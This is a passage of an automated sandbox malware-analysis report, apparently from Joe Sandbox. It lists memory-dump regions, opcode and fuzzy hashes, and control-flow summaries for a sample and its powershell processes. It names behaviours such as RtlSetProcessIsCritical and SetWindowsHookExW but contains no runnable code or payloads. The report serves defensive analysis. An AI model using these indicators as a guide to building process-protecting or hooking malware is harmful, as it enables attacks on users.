                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e359ac24c7d461e64c0ba72b1fd9bfee24b12dfeaf244330d283f2ed5ca8e92b
                                                              • Instruction ID: 51a99403dbbb5a31a303f0607e84ac17227c5f52ed02c146448ca0c98e8afec6
                                                              • Opcode Fuzzy Hash: e359ac24c7d461e64c0ba72b1fd9bfee24b12dfeaf244330d283f2ed5ca8e92b
                                                              • Instruction Fuzzy Hash: 9551B471A0DA898FDB99EB68D4A56A97BF0FF16310F0400BFD149C7697CB29E841CB41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 752 7ffd3488b6ed-7ffd3488b7d0 RtlSetProcessIsCritical 756 7ffd3488b7d8-7ffd3488b80d 752->756 757 7ffd3488b7d2 752->757 757->756
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: 2fbb4927bd770bf55cc79139944abddf2464079d643513ee27375d2721a567bb
                                                              • Instruction ID: e4400aab7c3bb98e906bc489574997c1c5c82abef703ab2f682eed59c9f1da90
                                                              • Opcode Fuzzy Hash: 2fbb4927bd770bf55cc79139944abddf2464079d643513ee27375d2721a567bb
                                                              • Instruction Fuzzy Hash: C641C43190C7488FD719DFA8D855AE9BBF0FF56311F04416EE08AD3692CB786846CB91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 759 7ffd3488bc38-7ffd3488bc3f 760 7ffd3488bc4a-7ffd3488bcbd 759->760 761 7ffd3488bc41-7ffd3488bc49 759->761 765 7ffd3488bd49-7ffd3488bd4d 760->765 766 7ffd3488bcc3-7ffd3488bcd0 760->766 761->760 767 7ffd3488bcd2-7ffd3488bd0f SetWindowsHookExW 765->767 766->767 768 7ffd3488bd17-7ffd3488bd48 767->768 769 7ffd3488bd11 767->769 769->768
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: ceb5da8b91e57bcd69608df6f1557a88bf559b64898da5975355f44ebfa7a646
                                                              • Instruction ID: edb94979767f05599f7b936d6086706f96a417f78a6f0896129f89c0f6ee57a5
                                                              • Opcode Fuzzy Hash: ceb5da8b91e57bcd69608df6f1557a88bf559b64898da5975355f44ebfa7a646
                                                              • Instruction Fuzzy Hash: 6D410B30A1CA4D4FDB58DB5C98566F97BE1EF6A321F04027EE059D3292CE74681287C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 458afff8ac0e356892aa284821c7dfc33e3126430d5de76deef241d39183922f
                                                              • Instruction ID: 619f6790ed8c2e3a66675acc5f9b4840d27a5f2148e4fde73bebd7dc65b3f0ed
                                                              • Opcode Fuzzy Hash: 458afff8ac0e356892aa284821c7dfc33e3126430d5de76deef241d39183922f
                                                              • Instruction Fuzzy Hash: ED718457A0F6D21FE7A2872818B51E96F91EF9321470844FBD2D8CB0D7D94D680A9392
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f33c11d599915b0c9e50ca8c1d44ba761d4c943bc572d82236c28c3529038a24
                                                              • Instruction ID: 858114e185145b4bd2b17c60983dad562aef15ccd9fcef067cc4b2d1dcd7aaf3
                                                              • Opcode Fuzzy Hash: f33c11d599915b0c9e50ca8c1d44ba761d4c943bc572d82236c28c3529038a24
                                                              • Instruction Fuzzy Hash: 5C511966A0EBC59FE75357285CBA0D97FA0EF13314B0901F7C985CA0A3EE5D1806D762
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 034bba971956191502e2e317cbc02801eea83624432632ac991fd0ab119f0db9
                                                              • Instruction ID: c250bb63efe1ae19db4d275c7a6e588897e6163258001ac04db02c8acefd80e9
                                                              • Opcode Fuzzy Hash: 034bba971956191502e2e317cbc02801eea83624432632ac991fd0ab119f0db9
                                                              • Instruction Fuzzy Hash: FC713531A0EBC64FE35ADB2888A94A9BBE0EF5731471801FED099C7593ED1DA843C751
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2229326324.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e96c18b6b05b8a3d57b2a53d5cb8dbd593eef3cb89d65dcc01bde964c77f0252
                                                              • Instruction ID: ad0e38f6ae13d018e629e301bd482e55a2663c7389b372188d291860b670c1d5
                                                              • Opcode Fuzzy Hash: e96c18b6b05b8a3d57b2a53d5cb8dbd593eef3cb89d65dcc01bde964c77f0252
                                                              • Instruction Fuzzy Hash: 77513D32B0DA968FE799E61C58B15747BD2EFA6250B1840BFC18DC7197DE28EC058351
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2229326324.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b969f9b379dbff3a40e9155f6740d1c781e24a57a6340ae0b4a9f4f38c116c8
                                                              • Instruction ID: 24e222f49812b9d41151d03cce25ec0fb750101caa0823cf0dd0f45235d10328
                                                              • Opcode Fuzzy Hash: 7b969f9b379dbff3a40e9155f6740d1c781e24a57a6340ae0b4a9f4f38c116c8
                                                              • Instruction Fuzzy Hash: 0C416A32B0DA498FEBA5D76C58A05B47BD1EF42324B0840BFC18DC7187EA18BC049391
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00982cc7534a065601e856ca55a45da10b81577d5892ab61de019c764f1c1e8e
                                                              • Instruction ID: b69342728d15ca029aa2a4a9c44c1833a6dd25ee6945e8cf973ca1deeab02bb6
                                                              • Opcode Fuzzy Hash: 00982cc7534a065601e856ca55a45da10b81577d5892ab61de019c764f1c1e8e
                                                              • Instruction Fuzzy Hash: BE312A7190CB488FDB589F4C98466E97BE0FB99310F10412FE449D3292DB74A846CBD2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2228269977.00007FFD3478D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3478D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd3478d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 448e8b01fe7154356b84ee6cc3643c8f66fc3cf67b58b1f7463dd4e83399e8fd
                                                              • Instruction ID: 2a6fe6805ce974010ab3abe2b3091b0a53597c3caa4aad8e758309cb7619deaa
                                                              • Opcode Fuzzy Hash: 448e8b01fe7154356b84ee6cc3643c8f66fc3cf67b58b1f7463dd4e83399e8fd
                                                              • Instruction Fuzzy Hash: 544125B150DBC48FE7969B2898569523FF0EF53320B1501DFD088CB0A3D629A846C7A3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 076068e8a97327c74345ccf010700c71f05f1767717fceba7bae0ec17395a79b
                                                              • Instruction ID: c0653995d31bf36a40f568af4635475b578d26224b3305d29b52f9ef9349b814
                                                              • Opcode Fuzzy Hash: 076068e8a97327c74345ccf010700c71f05f1767717fceba7bae0ec17395a79b
                                                              • Instruction Fuzzy Hash: FC31347090D6888FDB56DBAC98956EA3FF4EF93321F0441AFD088C7053DA68541AC792
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2229326324.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9ce89068947b87e098d86cd8cc5f1a81f0ff9b90f3080742178a14f17e89483
                                                              • Instruction ID: 143793e519330c8d51193b33c3f6e9c0315e1f2d6f2e7d43e56018518ba82eeb
                                                              • Opcode Fuzzy Hash: f9ce89068947b87e098d86cd8cc5f1a81f0ff9b90f3080742178a14f17e89483
                                                              • Instruction Fuzzy Hash: B5210B22B0D9978FE7A5E71C48F05346AC1EF66250B4940BED18DC71A7CD1CEC049311
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2229326324.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7dca437be6f1f975c7818d97be86e3234dc8d77540ac6ac39bce95f0fee2211a
                                                              • Instruction ID: ea76e641d65e193f5d4d85799d9c43806f784c872fc652f5a2e49c06ddd7ff0e
                                                              • Opcode Fuzzy Hash: 7dca437be6f1f975c7818d97be86e3234dc8d77540ac6ac39bce95f0fee2211a
                                                              • Instruction Fuzzy Hash: 2811E032A0E5858FE7A4D71898F45B87BD1EF0222474940FED59DDB09BCA1DBC049761
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2229326324.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3c6f4a649a0a09d04eb2be6004783833fc40251e3670485b431ff3f2ec4b44d
                                                              • Instruction ID: d8e50bed03419d1b036f4f05640cd88d730580883ab07a05da402856c8cc59a4
                                                              • Opcode Fuzzy Hash: e3c6f4a649a0a09d04eb2be6004783833fc40251e3670485b431ff3f2ec4b44d
                                                              • Instruction Fuzzy Hash: 6A110672B0D6884FEB65EA9848E45E87FD1EF56320B0880BEC54DCB197CD2DAC45C320
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction ID: 0c5e5649d06d92c1145b5404b9a75156bb07d5da2bacdf6660bb961c601e6699
                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction Fuzzy Hash: 5C01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651DA36E882CB45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2228770522.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^4$M_^7$M_^F$M_^J
                                                              • API String ID: 0-622050427
                                                              • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                              • Instruction ID: 9c0c05f8c333faab2dea8e5433de44f93eadbb4ada4e22e1690e82e5527060d5
                                                              • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                              • Instruction Fuzzy Hash: 9B21F2A7708465AED3127BFDA8249EA3754CF9433478917B2E198DB083F92870868AD0
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66932d015b3256cf929a258bd51274ccb0e4c155c49055baa97d695cf8898f38
                                                              • Instruction ID: fa2700455c919a45d6533336f842e0bd780b0f250de50cdc037529723fe0290d
                                                              • Opcode Fuzzy Hash: 66932d015b3256cf929a258bd51274ccb0e4c155c49055baa97d695cf8898f38
                                                              • Instruction Fuzzy Hash: B3D17030A08A4D8FDF99DF58C4A5AA97BE1FF69300F14416AD40DE72A6CB74E841DBC1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ea2c40086c9b622985f0b04f80e3ae263f9053f05bf92ec54015c766a496468
                                                              • Instruction ID: b058aae7dd5b20f2e59f9f9e63dd613d59b8e28c4fd34cd1dbc95b0f45ac7e38
                                                              • Opcode Fuzzy Hash: 4ea2c40086c9b622985f0b04f80e3ae263f9053f05bf92ec54015c766a496468
                                                              • Instruction Fuzzy Hash: FFB12770A1CB484FD759EF1CC8A56B57BE1FF9A310F10017ED18AC36A2DA65E846CB81
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2324167569.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd34980000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4a3ed0299c993d918637b344ced00cbf01412e8c2f3cda650722af49fafc6fd
                                                              • Instruction ID: 5f640445e63b09da525e11dd19b23660d6e862f0d8feb4db72390bf08616c69e
                                                              • Opcode Fuzzy Hash: e4a3ed0299c993d918637b344ced00cbf01412e8c2f3cda650722af49fafc6fd
                                                              • Instruction Fuzzy Hash: D5515832B0DA968FEBD9DA1C44B167577D2EFA6220B5801BEC24DC7197EE28EC058351
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2324167569.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd34980000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea40f62c7d952388400764e493b9bd61f22a8010dae4dba17ff222f8f35981d0
                                                              • Instruction ID: 1efc0dd5c82122bf7ff63ace4bc6bb2d07a2b41ead474a62663e99224a2502d2
                                                              • Opcode Fuzzy Hash: ea40f62c7d952388400764e493b9bd61f22a8010dae4dba17ff222f8f35981d0
                                                              • Instruction Fuzzy Hash: 4A41F432B0DA898FEBE9D76C54A15B477D1EF46224B0801BFD14DC7197E919BC048391
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3993f97dbc1adf892593a69c38dbcc26ff75f7e4b3dca034d2b57162b852c5b
                                                              • Instruction ID: bdc80dc57b3cadc382dbcbdc2e8bd38b5ccd619c363b5967ab1aa2505176a1ee
                                                              • Opcode Fuzzy Hash: e3993f97dbc1adf892593a69c38dbcc26ff75f7e4b3dca034d2b57162b852c5b
                                                              • Instruction Fuzzy Hash: BE412731A0DB885FDB19DB5C9C5A6A87FE0FB66310F04417FD449D3293CA64A816CBC2
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2322359071.00007FFD3479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3479D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd3479d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fde919d85721195787467d06f189b2d7542cad7b8cd8b549ad5902a50ec7f828
                                                              • Instruction ID: 6c084f4e17507ab7960558ff0b501d5971c776ca1821c289df1c011c5a655595
                                                              • Opcode Fuzzy Hash: fde919d85721195787467d06f189b2d7542cad7b8cd8b549ad5902a50ec7f828
                                                              • Instruction Fuzzy Hash: A241F67190DBC48FE7569B3998959523FF0EF53320B1905EFD088CB1A3D629B845C792
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2324167569.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd34980000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec2c3239382e2850254ec55decac601eff91133d498350d34ea9d23da68f92b0
                                                              • Instruction ID: b89eb315be7ba1f041818ad8131e7e8e5c8d0eab0dec96fa46048280296525b1
                                                              • Opcode Fuzzy Hash: ec2c3239382e2850254ec55decac601eff91133d498350d34ea9d23da68f92b0
                                                              • Instruction Fuzzy Hash: 1E21F522B0DA968FE7E9DB1C44B053466C2EF66214B4801BED24DC71ABEE1CEC049351
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2324167569.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd34980000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a8c3eb1df06564715292e6147ff91ad93fe030e53a0fa2487b068efb51f85af
                                                              • Instruction ID: e9fd6c30522f0f8a8c868a220e1735bb454c27e57c9d9de79f2589ad85decfa7
                                                              • Opcode Fuzzy Hash: 0a8c3eb1df06564715292e6147ff91ad93fe030e53a0fa2487b068efb51f85af
                                                              • Instruction Fuzzy Hash: 7611CE32A0E5858FE6E4DB2C84B45B8BAD1EF02224B4800FED55DC749AEA1DAC049361
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2324167569.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd34980000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 082fed0b9b0e4a3c91b5d176175d98198bd1a46dbc2e9233d62590321113395c
                                                              • Instruction ID: 7b856670e83582b4b55e90548cfd6971a1b1b29ad17c107cd1f3225bce55f71d
                                                              • Opcode Fuzzy Hash: 082fed0b9b0e4a3c91b5d176175d98198bd1a46dbc2e9233d62590321113395c
                                                              • Instruction Fuzzy Hash: A8110632B0D68C4FEB95EA9C44E41A87BD1EF5A310F0840BEC54CDB097CD29AC45C360
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction ID: deb5d86c88e8f26112380754d293aded1f7c495d532cba5f2c16f698bcc23440
                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                              • Instruction Fuzzy Hash: E201A73020CB0C4FD744EF0CE051AA6B3E0FB89320F10052DE58AC3651DA36E882CB41
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f283b9c74f66acfe5e497620f240b960123af2655562c0fd05f9d1d5288a9786
                                                              • Instruction ID: cb478ab6da068a6dc9c59634fd8c5c0a4cb71a2bcb4513b74835ffdf46093b02
                                                              • Opcode Fuzzy Hash: f283b9c74f66acfe5e497620f240b960123af2655562c0fd05f9d1d5288a9786
                                                              • Instruction Fuzzy Hash: 2DF0FC76A0D9894FDB81EF1CA8A50E97FA0FF66201B0501B7D649C7162DE6798088BC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2323209900.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                              • API String ID: 0-1415242001
                                                              • Opcode ID: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
                                                              • Instruction ID: f1a64f0b6e82653b6e2f797f0d6a21b5c083699dbe79f4594f21844774ac4221
                                                              • Opcode Fuzzy Hash: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
                                                              • Instruction Fuzzy Hash: 7C21C2B3B045155AC21236FDB8625EE6794DB9437834962F3E218DF513EF78B48B8A80
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e9ba965dfc689ae03982f41661b89ded3b204ff0ea381abbcbddc1f3f82be5d
                                                              • Instruction ID: 45c0ef8ee52f83b97d6fab133f583fb117c8d54054d6e8a1fd0b2789872ac0e2
                                                              • Opcode Fuzzy Hash: 9e9ba965dfc689ae03982f41661b89ded3b204ff0ea381abbcbddc1f3f82be5d
                                                              • Instruction Fuzzy Hash: 5091FB27A0DE965BE711A76C9CB60DE7F90DF5336470800B6CA94CB193ED1C24179792
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bab88495e8f8218fa2d9d132f388da7de84c8b6ba726976b09bd4116b85cf934
                                                              • Instruction ID: 083804bef055031796684341da24fa9e452d26ac301670ec7eeb8f233187476c
                                                              • Opcode Fuzzy Hash: bab88495e8f8218fa2d9d132f388da7de84c8b6ba726976b09bd4116b85cf934
                                                              • Instruction Fuzzy Hash: C3511971A0DB895FDB099F5858655A87FE0FB96311F04417FD088C7292DF28B806CBC2
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2466062534.00007FFD3477D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3477D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7ffd3477d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 506ed150b3195e51ced3e568285404ed1fcfa7d5c6b9e83e5d8057929eb05c62
                                                              • Instruction ID: 22c124d04542aad7305cba365b533dd1410234d04cfd8fededf2d9695afc5aeb
                                                              • Opcode Fuzzy Hash: 506ed150b3195e51ced3e568285404ed1fcfa7d5c6b9e83e5d8057929eb05c62
                                                              • Instruction Fuzzy Hash: 3041247140DBC48FE7569B399C959623FF0EF53320B1905DFE088CB1A3D629A846C7A2
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ee1c0cfdeb865a836a5d701defdc501550d12bf955d712256939d0cf8ba399b
                                                              • Instruction ID: 7ff77be39b3fca0de6baf761e02ac3828e52b27d262899f8bdad8020c19007b0
                                                              • Opcode Fuzzy Hash: 5ee1c0cfdeb865a836a5d701defdc501550d12bf955d712256939d0cf8ba399b
                                                              • Instruction Fuzzy Hash: 29213A3090CB4C4FEB59DFAC988A7E97FF0EB96320F04416BD448C3152DA74A41ACB91
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2468007323.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7ffd34960000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3db5cfb75cc300143901e218553e05cefd29ddd4f1becc73773202125aae3f72
                                                              • Instruction ID: 4142992b9a7abf350f55ddb053b6a08169c48cbfd0aa72e89a6efd89a620e93c
                                                              • Opcode Fuzzy Hash: 3db5cfb75cc300143901e218553e05cefd29ddd4f1becc73773202125aae3f72
                                                              • Instruction Fuzzy Hash: 19110672B0D6884FEB55EAA844E41A87BD1EF56334B0840BEC54CD7097CD2DAC45C360
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2467152797.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_7ffd34890000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                              • Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
